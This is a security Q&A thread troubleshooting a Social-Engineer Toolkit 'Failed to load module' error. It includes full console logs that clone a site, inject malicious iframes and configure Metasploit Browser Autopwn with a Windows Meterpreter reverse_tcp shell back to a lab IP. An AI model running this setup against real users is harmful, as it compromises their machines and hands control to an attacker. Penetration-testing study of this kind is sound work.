1

I'm trying to setup a website attack vector and I get in error when it tries to load up metasploit. Here's a look at my whole process:

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

set> 2

The Web Attack module is  a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.

The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.

The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method

  99) Return to Main Menu

set:webattack>2

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>1
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address or hostname for the reverse connection:192.168.56.101

  1. Java Required
  2. Google
  3. Facebook
  4. Twitter
  5. Yahoo

set:webattack> Select a template:1

 Enter the browser exploit you would like to use [8]:

   1) MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)
   2) MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)
   3) Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)
   4) Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)
   5) Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)
   6) Java Applet JMX Remote Code Execution (2013-01-10)
   7) MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)
   8) Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)
   9) Java 7 Applet Remote Code Execution (2012-08-26)
  10) Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)
  11) Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)
  12) Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)
  13) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)
  14) Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)
  15) Adobe Flash Player Object Type Confusion  (2012-05-04)
  16) Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)
  17) MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)
  18) Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)
  19) MS11-050 IE mshtml!CObjectElement Use After Free  (2011-06-16)
  20) Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)
  21) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)
  22) Internet Explorer CSS Import Use After Free (2010-11-29)
  23) Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)
  24) Internet Explorer CSS Tags Memory Corruption (2010-11-03)
  25) Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)
  26) Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)
  27) Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)
  28) Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)
  29) Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)
  30) Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)
  31) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)
  32) Microsoft Help Center XSS and Command Execution (2010-06-09)
  33) Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)
  34) Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)
  35) Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)
  36) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)
  37) Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)
  38) Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)
  39) Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)
  40) Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)
  41) FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)
  42) FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)
  43) Metasploit Browser Autopwn (USE AT OWN RISK!)

set:payloads>43


   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) Windows Bind Shell                      Execute payload and create an accepting port on remote system.
   5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
   6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
   7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
   8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
   9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
  10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and use Reverse Meterpreter
  11) Download/Run your Own Executable        Downloads an executable and runs it

set:payloads>2
set:payloads> Port to use for the reverse [443]:

[*] Cloning the website: 
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.

[!] Error:Apache does not appear to be running.
[!] Start it or turn APACHE off in config/set_config
[*] Attempting to start Apache manually...
[....] Starting web server: apache2apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
. ok 

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on Windows, Linux, and OSX [--]
[--] Apache web server is currently in use for performance. [--]
[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##
                            http://metasploit.pro


Save 45% of your time on large engagements with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.10.0-2014092602 [core:4.10.0.pre.2014092602 api:1.0.0]]
+ -- --=[ 1346 exploits - 740 auxiliary - 217 post        ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use ERROR
[-] Failed to load module: ERROR
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.56.101
LHOST => 192.168.56.101
resource (/root/.set/meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set/meta_config)> set URIPATH /
URIPATH => /
resource (/root/.set/meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
[-] Unknown command: exploit.

What is causing the "Failed to load module" error?

1
  • Generally failing to load a module means you haven't got the module available, the PATH is incorrect or your config/permissions are incorrect. Your best bet here is looking at the help available on metasploit.com or the rapid7 community
    – Rory Alsop
    Sep 28, 2014 at 21:13

2 Answers 2

3

Since it's actually saying "ERROR" from the resource script, my guess is that something borked in SET actually. Edit the /root/.set/meta_config file and change the line that says use ERROR to use exploit/multi/handler. Then in your msf> prompt type resource /root/.set/meta_config to reload the resource file.

Thats a temporary fix, you should file a "New Issue" in the SET repo with a link back to this post: https://github.com/trustedsec/social-engineer-toolkit/issues

1

This does not appear to be a SET issue, although its pulling input, I can't reproduce this in any fashion in the latest version. Only guess I have is that this is a super old version of SET..

set:webattack>1
[-] NAT/Port Forwarding can be used in the cases where your SET machine is not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
[-] Enter the IP address of your interface IP or if your using an external IP, what will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address or hostname for the reverse connection:192.168.5.5

  1. Java Required
  2. Google
  3. Facebook
  4. Twitter
  5. Yahoo

set:webattack> Select a template:1

 Enter the browser exploit you would like to use [8]:

   1) MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)
   2) MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)
   3) Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)
   4) Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)
   5) Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)
   6) Java Applet JMX Remote Code Execution (2013-01-10)
   7) MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)
   8) Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)
   9) Java 7 Applet Remote Code Execution (2012-08-26)
  10) Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)
  11) Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)
  12) Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)
  13) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)
  14) Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)
  15) Adobe Flash Player Object Type Confusion  (2012-05-04)
  16) Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)
  17) MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)
  18) Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)
  19) MS11-050 IE mshtml!CObjectElement Use After Free  (2011-06-16)
  20) Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)
  21) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)
  22) Internet Explorer CSS Import Use After Free (2010-11-29)
  23) Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)
  24) Internet Explorer CSS Tags Memory Corruption (2010-11-03)
  25) Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)
  26) Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)
  27) Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)
  28) Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)
  29) Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)
  30) Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)
  31) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)
  32) Microsoft Help Center XSS and Command Execution (2010-06-09)
  33) Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)
  34) Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)
  35) Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)
  36) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)
  37) Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)
  38) Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)
  39) Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)
  40) Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)
  41) FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)
  42) FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)
  43) Metasploit Browser Autopwn (USE AT OWN RISK!)

set:payloads>43


   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) Windows Bind Shell                      Execute payload and create an accepting port on remote system.
   5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
   6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
   7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
   8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
   9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
  10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and use Reverse Meterpreter
  11) Download/Run your Own Executable        Downloads an executable and runs it

set:payloads>2
set:payloads> Port to use for the reverse [443]:

[*] Cloning the website: 
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.

[*] Apache appears to be running, moving files into Apache's home

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on Windows, Linux, and OSX [--]
[--] Apache web server is currently in use for performance. [--]
[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.9.3-2014072301 [core:4.9 api:1.0] ]
+ -- --=[ 1324 exploits - 719 auxiliary - 213 post        ]
+ -- --=[ 346 payloads - 35 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use auxiliary/server/browser_autopwn
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.5.5
LHOST => 192.168.5.5
resource (/root/.set/meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set/meta_config)> set URIPATH /
URIPATH => /
resource (/root/.set/meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
[*] Auxiliary module running as background job
msf auxiliary(browser_autopwn) > 
[*] Setup
[*] Obfuscating initial javascript 2014-10-07 03:32:51 -0400
[*] Done in 0.55021736 seconds

[*] Starting exploit modules on host 192.168.5.5...
3
  • I am having the same issue, using the latest version of SET. I am also using Metasploit v4.10.0 whereas I noticed Dave Kennedy's test was with Metasploit v4.9.3, so it appears that something changed in the latest Metasploit release.
    – dp5479
    Oct 9, 2014 at 19:25
  • Can you reproduce your tests for metasploit 4.10?
    – schroeder
    Oct 9, 2014 at 19:52
  • Just tested with the latest git snapshots of SET and MSF on Kali and is working fine. Can you manually check the file ~/.set/meta_config?
    – void_in
    Oct 10, 2014 at 5:14

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged .